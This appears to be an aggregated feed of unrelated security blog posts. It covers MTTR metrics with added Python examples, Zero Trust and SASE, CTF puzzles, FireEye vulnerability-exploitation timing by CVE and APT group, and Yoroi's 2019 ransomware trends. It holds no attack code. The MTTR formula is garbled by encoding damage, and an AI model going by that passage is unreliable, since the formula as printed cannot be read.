It is imperative for enterprises to better align developers and security. The end goal is a state where developers aren’t seeing security as just a check box or something to throw over the fence to the security team during production, but as an essential part of their daily development process. As a maker of tools for development teams, Atlassian wants to make it easier for developers to build and operate secure products, while responding to security incidents more quickly and effectively. The partnership between Atlassian and McAfee combines the joint strengths to deliver an optimized security solution for customers.  Join us to learn more at the Atlassian 2020 Summit.

1 Source: “Smarter With Gartner” Blog, Is the Cloud Secure?, October 10, 2019, Kasey Panetta.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


The post Shift Left Inline – Integration with Atlassian Bitbucket CI/CD Pipes appeared first on McAfee Blogs.

Introducing Capture the Flag Puzzles!

Remember those boundless summer days playing “Capture the Flag” over the scent of freshly cut grass? No other care in the world aside from finding and seizing that victory flag with bragging rights for the rest of the day? “Capture the Flag” wasn’t just an intense physical exercise to release energy; it was a fun mental escape, too. That’s something many of us need now more than ever.

We know a lot about work-hard-play-hard here at Veracode. Every year, Veracoders intermingle practice and play in our “Innovation Hackathons,” encouraging each other to think outside of the box and flex our creative muscles. Veracode’s yearly Hackathon activities span the gamut of energizing challenges and perplexing puzzles - the latter of which we’re excited to share with all of you through

What is It’s “Capture the Flag” (CTF) for anyone looking to challenge their mind (and perhaps take a mental break from current events, too). is a series of puzzles ranging from simple to complex. Some require paper and a pencil while others involve advanced abilities and divergent thinking. Pick and choose which puzzles you want to tackle, then work in teams to solve them or fly solo and test your skills.

Signing up is easy and anyone can do it. Register here, confirm your account (note: we will not use your information for anything other than activities), and then dig into the challenges. You can also check the scoreboard to monitor your progress against others and see where you stand – there’s nothing wrong with a little friendly competition!

Ready, set, solve

Let’s get down to the nitty-gritty of how to solve puzzles on For each puzzle you open in the challenges section, you’ll need to solve the clues or work through the exercises to find a concealed password. That’s the “flag” we’re after. Once you’ve solved a puzzle and “captured” the hidden password, type it in as the solution on the puzzle’s page and instantly see if you’re right. If not, you’ll need to go back to the drawing board.

The puzzles are grouped into three basic levels:

Level 1: These are more common (think crossword puzzle) but might have another layer to them. If you get stuck, look for clues within clues.

Level 2: These are slightly trickier and might require some searching beyond your skillset, or information on specific types of puzzles and how to solve them.

Level 3: These are the most challenging puzzles that often require skills in programming or might push you to take basic skills to another level.

If you get stuck or need help, some of the puzzles offer guidance in the form of hints. You can also reach out to us on social media using #veracodepuzzles or post in our community to share tips, ask for clues, and celebrate victories.

Ultimately, we hope you have fun and can use these Hackathon puzzles to sharpen a skillset or spark creative inspiration just like we do.

Ready to get solving? Show us what you’ve got.

Using Median Time to Resolve Efficiently 

Customers that have embraced DevOps often ask me for the best metrics to measure their program. I always advocate focusing on policy compliance as the number one metric for understanding your risk, as this provides a succinct measurement of the security of your applications.

However, if you are looking to measure and motivate development teams, policy compliance doesn’t give you the granularity to introduce gamification or incentives. Policy compliance is very black and white; you either are compliant (good!) or you are not (bad!). So, when talking to customers about motivating teams in the spirit of continuous improvement, I like to bring up Mean Time to Resolve (MTTR).

I’ve also seen this as “Mean Time to Repair,” “Mean Time to Recovery,” or “Mean Time to Respond.” I personally like “resolve” as it indicates that the security finding has been closed, which is aligned with how we compute this metric.

You often see MTTR in association with DevOps and the tenet of making work visible and measurable – and thus improvable. This is why I bring it up with our users: knowing how long it takes you to resolve a security finding will help organizations make program improvements that move the needle on the overall metric of policy compliance.

How MTTR is calculated at Veracode

The standard definition for MTTR is along the lines of the following: corrective maintenance time / total number of corrective maintenance actions.

When it came time to implement MTTR in our new analytics feature, we initially interpreted this as the difference between each finding’s first-found date and its closed date, summed over all findings and divided by the total number of findings. Sounds good at face value, but when it comes to Veracode’s security findings, implementing this exact calculation gets a bit tricky.

Since customers are primarily using Static Analysis as part of their development pipelines we focus on static findings to ensure the calculation makes sense, though this is applicable to Dynamic Analysis and open-source findings as well.

For Static Analysis findings, each finding can be open and closed many times depending on the code that is scanned. If a developer scans a piece of code multiple times but with subtle changes, we can assert that findings are closed intentionally and fixed. If a developer scans code and forgets a module or only scans a small part of the code that they are working on, we don’t see the findings that were previously found and thus those are marked as closed as well since they are not present.

If the developer then scans the whole application again, those findings are reopened. This happens regularly through the development cycle. Measuring the activity of open and closed doesn???t seem relevant in this context. However, once you are focused on a release candidate, this sort of measurement takes on new importance.

Additionally, if you are looking at an application that is in production, this measurement is even more important, as this is where we are effectively seeing the time that an organization takes to respond to and resolve security findings.

Delivering a meaningful MTTR

How do we provide MTTR that is meaningful? In Veracode Analytics, we focus on the most recent time a finding was found, and the most recent time that the finding was closed. We always look at the policy context for calculating MTTR. While this can be calculated on a per-sandbox context basis, attempting to calculate MTTR across all sandboxes leads to very bizarre data due to flaw matching.

If a flaw is open in Sandbox 1 but closed in Sandbox 3 because it wasn’t present, and mitigated in Sandbox 17, what is the current state of that flaw? Does the most recent scan, regardless of sandbox or policy, represent the “current” state, or does it just represent a scan that was performed? This is why limiting to the policy context is important, since there is a level of control for the scans performed at the policy level.

“Resolved” means both fixed (also known as “remediated,” or no longer present in the scan) as well as mitigated, where someone has documented a compensating control for the finding and that control has been approved. This means that if a finding has an associated approved mitigation, the most recent time it was found could also be the exact same time it was resolved, since the mitigation will immediately close the finding.

The final nuance to MTTR is to compare the speed of addressing policy-impacting findings vs. general security debt. Veracode’s policy is regularly – and should be – used as a sieve to ensure clear communication with development teams on what is important and what needs to be fixed, as opposed to what is simply additional information. If the policy is used correctly, you should see that policy-impacting findings are resolved at a faster rate than all other findings. If this isn’t the case, then the policy isn’t being used by the dev team to prioritize work.

The “average” approach to MTTR

MTTR is by nature a calculation; despite its name, we are actually performing an average.

“Days to Resolve” is a dimension on a finding. This data is only populated if the finding is in a closed state. A finding is a flaw that Veracode has matched across many scans; incidentally, this is why we separate out “Scan Explore” from “Findings Explore” in the Analytics feature, as scans are a point in time while findings span time.

When we look at MTTR, we are inherently looking at a group of findings and their “Days to Resolve” dimensions, then taking an average: the total time to resolve divided by the number of findings.

Measuring Time to Resolve for your organization

A customer recently asked me why he saw a different MTTR for his entire organization than when he found the average MTTR for his three business units.

For each application, you have N number of findings in a closed state with a Time to Resolve. When we look at the measure Mean Time to Resolve, we are actually providing the average Time to Resolve for the dimension selected. So, when you look at a single application and see ???Days to Resolve,??? you are actually seeing the average across N.


Average time to resolve = ツ?( ホ」 xiツ?) / n = (Sum of Time to resolve for each finding) / Number of findings

The sum is asking why (A= ( ホ」 xiツ?) / n1)+ (B = ( ホ」 xiツ?) / n2)+ (C= ( ホ」 xiツ?) / n3)+ ツ???? (Z =( ホ」 xiツ?) / nA) where n1, n2, and n3 are each business unit (BU), and nA is all three BU???s together.

When you look at this mathematically and think about the order of operations, you will realize that you always complete the ホ」 xiツ?before you divide by the number of findings. This means that each BU (A, B, and C) may have drastically different numbers than all of the BU???s together (Z) because you are taking the division step before you take the addition step???which is mathematically incorrect.

In short, you are providing equal weighting where there should not be equal weighting.

MTTR Example

Here is an example:

BU A contains 2 closed flaws that took 1 day to close. The MTTR for BU A = (1+1)/2 = 1

BU B contains 200 closed flaws that took 20 days each to close. The MTTR for BU B = (200×20)/200 = 20

If we then add those and divide by two, we do not get the MTTR for all flaws across the two BUs. Instead, we get a number that is meaningless because of the significant weight that is given to the two flaws of BU A. If we want the MTTR for all flaws across the two BUs, then we must add the Time to Resolve of all flaws together and then divide by the total number of flaws.
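The pooled MTTR versus the average of per-BU MTTRs, worked through in code on the BU A / BU B scenario above. This is an added example, not Veracode's code; the finding records and their field names (business_unit, days_to_resolve) are constructed for illustration.

```python
"""Pooled MTTR versus an average of per-business-unit MTTRs.

Added example, not Veracode's code. Findings are constructed records with a
"business_unit" and a "days_to_resolve" value (the post's Days to Resolve
dimension, populated only for closed findings); both field names are assumptions.
"""
from collections import defaultdict
from statistics import mean

# Constructed findings reproducing the post's scenario: BU A has two findings
# closed in 1 day each, BU B has 200 findings closed in 20 days each. One open
# finding (days_to_resolve None) is included to show that it is ignored.
FINDINGS = (
    [{"business_unit": "A", "days_to_resolve": 1} for _ in range(2)]
    + [{"business_unit": "B", "days_to_resolve": 20} for _ in range(200)]
    + [{"business_unit": "A", "days_to_resolve": None}]
)


def closed_days(findings):
    """Days to Resolve of the closed findings only; open findings carry no value."""
    return [f["days_to_resolve"] for f in findings if f["days_to_resolve"] is not None]


def mttr(findings):
    """Pooled MTTR: sum of Days to Resolve divided by the number of closed findings."""
    days = closed_days(findings)
    if not days:
        raise ValueError("no closed findings, MTTR is undefined")
    return sum(days) / len(days)


def group_by_unit(findings):
    groups = defaultdict(list)
    for f in findings:
        groups[f["business_unit"]].append(f)
    return groups


def mttr_by_unit(findings):
    """MTTR computed separately for each business unit (the sum happens per BU)."""
    return {bu: mttr(fs) for bu, fs in group_by_unit(findings).items()}


def mean_of_unit_mttrs(findings):
    """The misleading aggregation: an average of averages gives every BU the
    same weight no matter how many findings it contributed."""
    return mean(mttr_by_unit(findings).values())


def weighted_mean_of_unit_mttrs(findings):
    """Recombining per-BU MTTRs correctly: weight each BU's MTTR by its number of
    closed findings, which is algebraically the pooled MTTR again."""
    groups = group_by_unit(findings)
    total_days = sum(mttr(fs) * len(closed_days(fs)) for fs in groups.values())
    total_findings = sum(len(closed_days(fs)) for fs in groups.values())
    return total_days / total_findings


if __name__ == "__main__":
    print("per BU:", mttr_by_unit(FINDINGS))                        # {'A': 1.0, 'B': 20.0}
    print("average of averages:", mean_of_unit_mttrs(FINDINGS))     # 10.5
    print("pooled MTTR:", round(mttr(FINDINGS), 2))                 # 19.81
    print("weighted recombination:", round(weighted_mean_of_unit_mttrs(FINDINGS), 2))
```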

Using MTTR the right way

Across our customer base, we see a wide variety in MTTR. A lot of this is tied to the type of application and its criticality to the organization. If you have an internal-facing legacy system, an average time to resolve for that application of 30 days may be great. If you have an external application that handles your PII, five days may be too long for your average time to resolve.

Metrics and KPIs provide information, but it is up to the AppSec leadership to use the information and make data-driven decisions: both in running the day-to-day operations of the AppSec program and in managing the understanding of risk for the organization as a whole.


Zero Trust, SASE-Digital Enablers or Adding Complexity to Cyber Ecosystems

Given the title of this article, I suspect you are reading this because you have recently been asked “What is the difference between Zero Trust and SASE?”. I further suspect that the next question you were asked, of course, was “Which approach is right for my organization?”. The reality is that both are built upon a similar foundation of least-privilege management, and both matter in the bigger picture. The real question is how you apply ZTA and SASE to your organization.

The answer is complex. Yes, this may seem like a classic consultant’s default position on just about any complicated question. In this case, it really does depend on several factors. First let’s look at the basic definitions of ZTA and SASE and their origins.

The term Zero Trust was coined by the industry analyst Forrester a little over a decade ago. The initial concept focused on segmenting and securing the network across locations and hosting models, and promoted the idea of the Zero Trust model — the need to challenge and eliminate the inherent trust assumptions in our security strategies that made us vulnerable to external and internal attacks.

Fast forward to the present: Zero Trust has evolved into a framework and/or strategy, as described by some industry experts. The current definition further extends the concept to secure network connectivity, where the initial security posture has no implicit trust between different entities, regardless of whether they are inside or outside the enterprise perimeter. Least-privilege access to networked capabilities is dynamically extended only after an assessment of the identity of the entity, the system and the context.

Secure Access Service Edge (pronounced “sassy”) is a term defined by Gartner in 2019. SASE builds on the ZTA concept, but credits digital business transformation and specifically introduces the idea that the future of network security is in the cloud. The SASE model or framework inverts network and security service design patterns, shifting the focal point to the identity of the user and/or device — not the data center. SASE suggests that security and risk management leaders will need a converged, cloud-delivered secure access service edge to address this shift.

The National Institute of Standards and Technology (NIST) has also weighed in with its definition of Zero Trust in NIST SP 800-207. NIST defines ZTA not as a single network architecture but as a set of guiding principles for network infrastructure design and operation that can be used to improve the security posture of any classification or sensitivity level.

Many organizations already have elements of a ZTA and/or SASE in their enterprise infrastructure today. Organizations should prioritize identifying architecture gaps against their current state and incrementally implement zero trust principles, process changes and technology solutions that protect their data assets and business functions, moving towards a desired future state with measurable success criteria defined well in advance.

Most enterprise infrastructures will operate in a hybrid Zero Trust-SASE/Legacy mode for the next several years while continuing to invest in ongoing IT modernization initiatives and improving organization business processes. Organizations need to implement effective information security and resiliency practices for zero trust and SASE to be effective. When complemented with existing cybersecurity policies and guidance, identity and access management, continuous monitoring, and good cybersecurity best practices, ZTA and SASE can reinforce an organization’s security posture using a managed risk approach and protect against common and advanced threats.

Final thoughts on the path forward: crawl, walk, run towards ZTA and SASE. Engage your security vendors and have them run ZTA/SASE workshops with you to help identify your organization's priorities. Shared experiences with implementing ZTA and SASE are key to successful adoption. When exploring ZTA and SASE, remember that you need a comprehensive device-to-cloud strategy.

The post Zero Trust, SASE-Digital Enablers or Adding Complexity to Cyber Ecosystems appeared first on McAfee Blogs.

Tracking Attackers With Word Web Bugs (Cyber Deception)

Hello and welcome! My name is John Strand, and in this video, we’re going to be talking about Word Web Bug Servers. Now the idea of a Word Web Bug Server is we can create a Word document that any time that document is opened it will actually create a call back and it will […]

The post Tracking Attackers With Word Web Bugs (Cyber Deception) appeared first on Black Hills Information Security.

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities.

Attackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.

Figure 1: Percentage of vulnerabilities exploited at various times in relation to patch release

FireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days – before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.

We believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.

Figure 2: Time between vulnerability exploitation and patch issuance

Time Between Disclosure and Patch Release

The average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.

Exploitation After Patch Release

While the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.

Time to Exploit for Vulnerabilities First Exploited after a Patch

Hours: Two vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602.

One Week: 12 percent of vulnerabilities were exploited within the first week following the patch release.

One Month: 15 percent of vulnerabilities were exploited after one week but within one month of patch release.

Years: In multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior.

Table 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure
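A way to reproduce the Table 1 bucketing over your own vulnerability data: compute the days between patch release and first observed exploitation, classify each record into the post's categories (zero-day, hours, week, month, longer), and report the shares. This is an added example, not FireEye Mandiant's code or data; the records and identifiers are constructed placeholders.

```python
"""Bucketing the gap between patch release and first observed exploitation.

Added example, not FireEye Mandiant code or data. The records below are
constructed, the identifiers are placeholders, and the bucket boundaries follow
the categories of the post's Table 1 (hours, one week, one month, years).
"""
from datetime import date

# Constructed records: (identifier, patch release date, first observed
# exploitation date). Real entries would come from a CTI feed, not this list.
RECORDS = [
    ("CVE-PLACEHOLDER-1", date(2019, 3, 5), date(2019, 2, 20)),  # exploited before patch
    ("CVE-PLACEHOLDER-2", date(2019, 3, 5), date(2019, 3, 5)),   # same day as patch
    ("CVE-PLACEHOLDER-3", date(2019, 3, 5), date(2019, 3, 9)),   # 4 days after
    ("CVE-PLACEHOLDER-4", date(2019, 3, 5), date(2019, 3, 30)),  # 25 days after
    ("CVE-PLACEHOLDER-5", date(2010, 8, 1), date(2019, 6, 1)),   # years after
]

# Ordered buckets; the first predicate that matches wins.
BUCKETS = (
    ("zero-day (before patch)", lambda d: d < 0),
    ("within hours (same day)", lambda d: d == 0),
    ("within one week", lambda d: 1 <= d <= 7),
    ("within one month", lambda d: 7 < d <= 30),
    ("more than one month", lambda d: d > 30),
)


def days_after_patch(patch_date, exploited_date):
    """Days from patch release to first observed exploitation; negative means
    the vulnerability was exploited as a zero-day."""
    return (exploited_date - patch_date).days


def bucket(days):
    for name, matches in BUCKETS:
        if matches(days):
            return name
    raise ValueError(f"no bucket for {days} days")


def exploitation_summary(records):
    """Map each bucket name to (count, percentage of all records), rounded to
    whole percent as the post reports them."""
    counts = {name: 0 for name, _ in BUCKETS}
    for _, patched, exploited in records:
        counts[bucket(days_after_patch(patched, exploited))] += 1
    total = len(records)
    return {name: (n, round(100 * n / total)) for name, n in counts.items()}


def post_patch_share(records):
    """Percentage of records exploited only after a patch existed (the post's
    complement to its zero-day figure)."""
    after = sum(1 for _, p, e in records if days_after_patch(p, e) >= 0)
    return round(100 * after / len(records))


if __name__ == "__main__":
    for name, (count, pct) in exploitation_summary(RECORDS).items():
        print(f"{name:28s} {count:3d} ({pct}%)")
    print("exploited after patch:", post_patch_share(RECORDS), "%")
```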

Case Studies

We continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.

Figure 3: Timeline of activity for CVE-2018-15982

CVE-2018-15982: A use-after-free vulnerability in a file package in Adobe Flash Player and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups—Russia's APT28 and North Korea's APT37—as well as TEMP.MetaStrike and other financially motivated attackers.

Figure 4: Timeline of activity for CVE-2018-20250

CVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean and Russian groups, as well as the Iranian groups APT33 and TEMP.Zagros.

Figure 5: Timeline of Activity for CVE-2018-4878

CVE-2018-4878: A use-after-free vulnerability exists within the DRMManager’s “initialize” call in Adobe Flash Player and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea’s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia’s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea’s TEMP.Hermit also using it within approximately a month of disclosure.

Availability of PoC or Exploit Code

The availability of PoC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that PoC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or PoC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).

Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events

Table 2 only partially survived extraction. Its columns included a FireEye Risk Rating, but the CVE identifiers and the ratings were not recovered. The recoverable cells give the time from PoC or exploit code publication to first observed exploitation as 1 day (three rows) or 2 days (six rows), and name the affected products Cisco Adaptive Security Appliance (twice), Apache Struts, Oracle WebLogic Server, Microsoft Windows Server and Atlassian Confluence; the product of three rows was not recovered.

Table 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018–Q3 2019

Trends by Targeted Products

FireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.

The majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.

Figure 6: Exploited vulnerabilities by vendor, Q1 2018–Q3 2019

Outlook and Implications

The speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.

We recommend using this exploitation trend information to better prioritize patching schedules, in combination with other factors such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment. Together, these may help to mitigate the risk of a large portion of malicious activity.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviours in order to figure out where things are going, so every year my colleagues from Yoroi and I spend several weeks studying what we observed during the past months and writing the Yoroi Cybersecurity Annual Report (freely downloadable here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year for the cyber security of the European productive sector. The peculiarity of the year is not strictly related to the number of hacking attempts or to the malware code spread all over the Internet to compromise company assets and data, but to the evolution and consolidation of a new, highly dangerous kind of cyber attack. In 2019 we noticed a deep change in a consistent part of the global threat landscape, typically populated by state-sponsored actors, cyber-criminals and hacktivists, each with its own attributes in motivations, objectives, methods and sophistication.

During 2019 we observed a rapid evolution of cyber crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. These actors are also involved in cyber-espionage, CEO fraud, credential-stealing operations and the theft of PII (Personally Identifiable Information) and IP (Intellectual Property), but traditionally they are much more active in the so-called “opportunistic” cyber attacks: attacks opportunistically directed at the whole internet population, such as botnet and crypto-miner infection waves, but also regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagation waves.

In 2019, as in 2018, ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase of the ransomware phenomenon, both in terms of newborn ransomware families and in ransom payment options, driven by the consolidation of the digital cryptocurrency market, which made the traditional tracking techniques operated by law enforcement agencies less effective due to new untrackable cryptocurrencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators moved into this emerging sector, leveraging their infection capabilities, their long-term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow-up ransomware within infected hosts. A typical example is the GandCrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” unit; let’s call them “DarkTeams”. These units are able to manually engage high-value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network right after ensuring the deletion of the backup copies. Many times they also use industry-specific knowledge to tamper with management networks and hypervisors, reaching an impressive level of potential damage.

Actually, this kind of behaviour is not new to us. Such methods of operation have been used for a long time, but not by such a large number of actors and not with such objectives. Network penetration was in fact a peculiarity of state-sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referred to as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.

During 2019, we observed a strong game change in the ransomware attack panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks, carrying them into private business sectors that were not traditionally prepared to deal with such threats. Then they started to hit organizations with high-impact business attacks tailored to be very effective in the victim’s context. We are facing the evolution of ransomware into Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attack model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operations of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they were only the tip of the iceberg. Many other criminal groups have consolidated this kind of operation, such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.

In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shaming of their victims. Maze was one of the first actors pioneering this practice in 2019: the group started to disclose the names of the private companies they hacked into, along with pieces of internal data stolen during the network intrusions.

The problem arises when the stolen data includes Intellectual Property and Personally Identifiable Information. In such a case the attacker leaves the victim organization in an additional, unfortunate position during the cyber-crisis: handling the data breach and the fines imposed by the Data Protection Authorities. During 2020 we expect these practices to become more and more common in the criminal ecosystem. Thus, adopting a proactive approach to the Cyber Security Strategy, leveraging services like Yoroi’s Cyber Security Defence Center, could be crucial to equip the company with the proper technology to acquire visibility on targeted ransomware attacks, and with the knowledge, skills and processes to spot and handle this new class of threats.

Zero-Day Malware

Well-known threats are always easier to recognize and manage, since components and intents are very often clear. For example a ransomware, as known today, performs some standard operations such as (but not limited to): reading a file, encrypting it and writing it back. Early discovery of known threat families helps analysts perform quick and precise analyses, while unknown threats are always difficult to manage since analysts first need to discover the intentions and then map the behaviour back to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform, trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports whether the malicious files are detected by anti-virus technologies at detection time. This specific analysis is mainly done to figure out whether the incoming threat would be able to bypass perimeter and endpoint defences. As a positive side effect, we collect data on detected threats related to their notoriety. In other words, we are able to see whether a malware belonging to a threat actor or related to a specific operation (or incident) is detected by AV, firewall, next-generation security products and the endpoints in use.

In this context, we should define what we mean by Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of an arbitrary malware family. The following image (Fig. 1) shows how most of the analyzed malware is unknown to the InfoSec community and to common antivirus vendors. This finding supports the picture of an ever-evolving malware panorama in which attackers start from a shared code base but modify it depending on their need to stay stealthy.


The reported data are collected during the first propagation of the malicious files across organizations. This means companies are highly exposed to the risk of Zero-Day malware. Detection and response time play a central role in such cases, where the attack stays stealthy for hours or even days.

Along with the Zero-Day malware observation, most of the malware known at time of delivery does not have high chances of being blocked by security controls. 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed, less than 20% of the analyzed samples classified as “not Zero-Day” are detected by more than 15 AV engines.

Drilling down into the behavioural classification of the intercepted samples known to fewer than 5 antivirus engines at detection time, the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or components) leads with 54% of cases, slightly decreasing since 2018. Another interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% in 2018 to the current 2%, and the sharp rise of “Trojan” behaviour up to 35% of cases, more than double the 15% of 2018.

This trend supports the evidence that ransomware attacks in 2019 began to follow a targeted approach, as described in the “The Rise of Targeted Ransomware” section.


A reasonable interpretation of these shifts in the data is consistent with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, much of the delivered malware is actually a single part of a more complex infection chain, a chain able to install multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.

This trend is also validated by the Zero-Day malware data set: the samples likely unknown to the InfoSec community at the time of delivery substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan rose from 28% to 52% of cases, showing similar macro variations.


If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Working From Home: Building Your Own Setup

This is the fifth week that my company (Yoroi) and I have been working from home (covid-19). While every company process is running smoothly and quickly, personal quarantine is getting quite long and heavy, especially if you are accustomed to travelling a lot for work. Under these circumstances the home office setup becomes very important, as you should be comfortable delivering as much as you did while sitting in your perfectly fitting office. Moreover, during the past few weeks I received many emails and private messages from people like me asking for personal suggestions on home setup. So I decided to write a little blog post with my personal suggestions on home setup for remote workers.

First: What you do.

My personal home desk has changed a lot over the years. On one hand new technology became available, but on the other hand (and most importantly) my role and interests changed a lot over time. I started with a super-nerd home setup while I was in college, including soldering irons, a desoldering hot-air station, Arduino boards all over the shelves, Raspberry Pis with many case flavours, three monitors (one of them vertically oriented, for reading documentation), a black screen and mechanical keyboards. This environment fitted my needs at that specific time, but it would not fit my current needs. The first thing you should do in refactoring your home desk is to understand what you do. Not what you would like to do, but rather what you do. Before you start surfing gadget websites, just focus on what you do on a daily basis. A developer and a malware analyst share few needs, and their environments won’t be close to each other. If you are a CXX, your environment will definitely look different from your IT manager’s!

Second: Less is more.

